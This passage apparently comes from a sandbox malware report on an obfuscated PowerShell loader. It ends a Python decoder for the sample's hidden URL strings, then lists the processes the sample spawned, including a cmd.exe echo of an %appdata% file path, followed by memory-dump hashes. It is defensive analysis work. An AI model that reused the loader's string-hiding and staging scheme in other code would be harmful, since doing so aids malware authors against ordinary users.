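        "rotate": gaardspladsens(ROTATE_URL),          # picks the next URL index each loop pass
        "urls": gaardspladsens(UNYTTIGST).split(delimiter),
    }


def hostnames(urls: list[str]) -> list[str]:
    """Host values to expect in the sandbox's HTTP sessions for these URLs."""
    return [urlsplit(u).hostname for u in urls]


if __name__ == "__main__":
    stage = decode_stage()
    for key, value in stage.items():
        print(f"{key}: {value}")
    print("hosts:", hostnames(stage["urls"]))
```

The decoder deliberately copies the sample's own loop bound (len - 1, not len) so that a trailing filler block is dropped the same way PowerShell drops it; running it with a plain "every sixth character" slice would append a stray character to some strings. Literals whose filler contains two consecutive spaces (for example the $Cometlike command that produces the cmd.exe line of Target ID 11) do not decode from this page, because the report's HTML rendering collapses double spaces; the five strings above contain none.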
                                                                            Target ID:10
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:11
                                                                            Start time:04:39:30
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                                            Imagebase:0x7ff74bc40000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c75462d0f3cc6a3b4c8b9d62afed5260f8bc43d5c4d93dee81e86eb69ec7853
                                                                              • Instruction ID: bbb4a5564a143fb2355601aa929207f73c9ecf1266c433233caed0ae02bec082
                                                                              • Opcode Fuzzy Hash: 9c75462d0f3cc6a3b4c8b9d62afed5260f8bc43d5c4d93dee81e86eb69ec7853
                                                                              • Instruction Fuzzy Hash: E7E11732E0DB864FE396AB285855274BBD1FF56324F8901FBC549C7293DA18BC4583A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3bc088c5b34f2dbf1f3c7405815e65d81cee699f04727a85f1c0c1affccb9a9b
                                                                              • Instruction ID: 3328a18969f11000885691802e9780095df641e97854ed23be5d90052261ef84
                                                                              • Opcode Fuzzy Hash: 3bc088c5b34f2dbf1f3c7405815e65d81cee699f04727a85f1c0c1affccb9a9b
                                                                              • Instruction Fuzzy Hash: 7BD14AB1A0EA894FE755EF2888555B9BBE1FF06364B5401FEC08DC7293DA18BC45C3A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609664942.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2601b05bdd0dce5a3055d3f8fc4cea59de8b7b9af0ae9d8e54ac3cfb64c073d3
                                                                              • Instruction ID: 00ac2b39ef645bf366dea50eda4f4b08f41a0eb46caa4ba8742bb17f64d4ecc1
                                                                              • Opcode Fuzzy Hash: 2601b05bdd0dce5a3055d3f8fc4cea59de8b7b9af0ae9d8e54ac3cfb64c073d3
                                                                              • Instruction Fuzzy Hash: 1721F732E0DA4A4FF3D5AB285845274A3C2FF45364FD901BAC10CC7393DE19BC8546A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1609184003.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 481980cb38a17d3372d01da5eba76b74cf78a48a197ab9434a6ea1a31d540f70
                                                                              • Instruction ID: 220aabdae5291cceb07e77127e857073bbadf5ffd87d1b56840d3d6b90d7c3c2
                                                                              • Opcode Fuzzy Hash: 481980cb38a17d3372d01da5eba76b74cf78a48a197ab9434a6ea1a31d540f70
                                                                              • Instruction Fuzzy Hash: B801A73010CB0C4FD744EF0CE491AA5B7E0FB95360F10052DE58AC3651D736E882CB41
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435622959.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7d5528757939fb7ce9f3fa7a1c1186f9a15c4b4dcb2436e8d587f742ec90da10
                                                                              • Instruction ID: 70b5c88523ce368696ddf074b6f2f4138ad29551905e7a8b7610dcfb3deda7d2
                                                                              • Opcode Fuzzy Hash: 7d5528757939fb7ce9f3fa7a1c1186f9a15c4b4dcb2436e8d587f742ec90da10
                                                                              • Instruction Fuzzy Hash: 1BD14631A0DA894FE795EF2888956B9BBA5FF06324F4401FED04DC7293DE58B845C3A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435622959.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab68faf6fd0d54ab82c2d98736d0abff806a76ad3200e1a66bd4a09ecc9e7bfe
                                                                              • Instruction ID: 9209d406a4e94cf207ee2c82f97cd3b8e917bfb7bd678e8820b20dc69a800329
                                                                              • Opcode Fuzzy Hash: ab68faf6fd0d54ab82c2d98736d0abff806a76ad3200e1a66bd4a09ecc9e7bfe
                                                                              • Instruction Fuzzy Hash: 48810321E0DA864FE799EF284495278BB95FF05724B9900FEC04DCB293DE55BC8583A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.1435313661.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 7724e511bd31ea15bc0f7caf8b47e0b4994d264237c09fa034e1856b7e005404
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 6701677115CB0C4FD744EF0CE491AA5B7E0FB95364F50056DE58AC3651DB36E882CB45
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb560d1584a645d9f24f5b1abc5b0a0a91a6a1d593be454dfea354a470669e9d
                                                                              • Instruction ID: b2d74c30baa1b806ba8d49f47458ba01f0f2f64ae00a136b158cdea49f260ba5
                                                                              • Opcode Fuzzy Hash: eb560d1584a645d9f24f5b1abc5b0a0a91a6a1d593be454dfea354a470669e9d
                                                                              • Instruction Fuzzy Hash: A2E11B3190DA8A4FE755EF2888556BCBBE1FF46328F9401BAD04DC7293DF28A845C751
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f44332d834e040709348115db7c38b75e7513367beb6c25481e1bd627eccda48
                                                                              • Instruction ID: 9a3838a77ccec6ba5cf18368840cb5ea0adab014c16598015150a7ad9405a68d
                                                                              • Opcode Fuzzy Hash: f44332d834e040709348115db7c38b75e7513367beb6c25481e1bd627eccda48
                                                                              • Instruction Fuzzy Hash: 6FD1583190DA8A4FE795EB2848555B9BBE1FF16324F4801FED04DC72D3EA14B846C3A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f62ed39d6d648b54a7e3f3a6e102bd68207bd5de41f912504fa5baae8584cd83
                                                                              • Instruction ID: e4b3c509811ce243e4e5920883fee3e5db4be065b8e8e772ee106a5ec9b42d22
                                                                              • Opcode Fuzzy Hash: f62ed39d6d648b54a7e3f3a6e102bd68207bd5de41f912504fa5baae8584cd83
                                                                              • Instruction Fuzzy Hash: 24C15D71A08A4D8FDB84EF58D495AE9BBE1FF98310F54426AD409D7296CB34F881CBD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 03b3bc77ab36b4b0d8a3df81dc0c606ad8ce80cbe921aed575faaa34309e60a0
                                                                              • Instruction ID: 91983dc8ce0544d4092f49bdc10fc145af37b0ecfe12951d09124b55977deb89
                                                                              • Opcode Fuzzy Hash: 03b3bc77ab36b4b0d8a3df81dc0c606ad8ce80cbe921aed575faaa34309e60a0
                                                                              • Instruction Fuzzy Hash: 33B13522A0D6950FD301BB6DECA52E57FA0DF523B5B0941BBD1C8CB293DD18784A87A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 91556f4edea40280b5fc2f7491d94807eb850250f132e8c32f986daa0e46662e
                                                                              • Instruction ID: ad3403a74a2dece67cc89b2fcc1fdde1df9abbbd36738f1cb25368e891e885c8
                                                                              • Opcode Fuzzy Hash: 91556f4edea40280b5fc2f7491d94807eb850250f132e8c32f986daa0e46662e
                                                                              • Instruction Fuzzy Hash: 0851C6A590E7C55FD353AB780865264BFA4FF07228B4944EFD0C9CB1E3DA1C6856C362
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 664fab7ec32bcf00857d914833c8361cafc70ad02a1d8c749ba354ded3e36c6a
                                                                              • Instruction ID: 6e6b46f05e1bacdfa0b638f9828c1bb4c3bd2f0adb6d17f5746239e36c0feea5
                                                                              • Opcode Fuzzy Hash: 664fab7ec32bcf00857d914833c8361cafc70ad02a1d8c749ba354ded3e36c6a
                                                                              • Instruction Fuzzy Hash: A351963291DA8A4FF395AB2848542BCB6D6FF45368FD901B9D00DC7293DE29BC848751
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663703385.00007FF7C0F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0236990865bb8a123702aea550decaca95d68f3c3e9f9523f64a624fe4295063
                                                                              • Instruction ID: 2752191e728959a7bed38b2dd298d3b004e7bd263cc2c5d03f095f04b5af9f86
                                                                              • Opcode Fuzzy Hash: 0236990865bb8a123702aea550decaca95d68f3c3e9f9523f64a624fe4295063
                                                                              • Instruction Fuzzy Hash: 1B31F722E0DA474FE6A4AE1858D1278E6D6FF84774F9842BAD40DC72C2DF98BC844691
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2663066124.00007FF7C0E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ff7c0e30000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: ed6c82286f2d2954162bd8bf9d870e9bb07b2d81ed7dda1794b2662ffa6e5ca7
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7A01677115CB0C4FD748EF0CE491AA5B7E0FB95364F50056DE58AC3651DB36E881CB45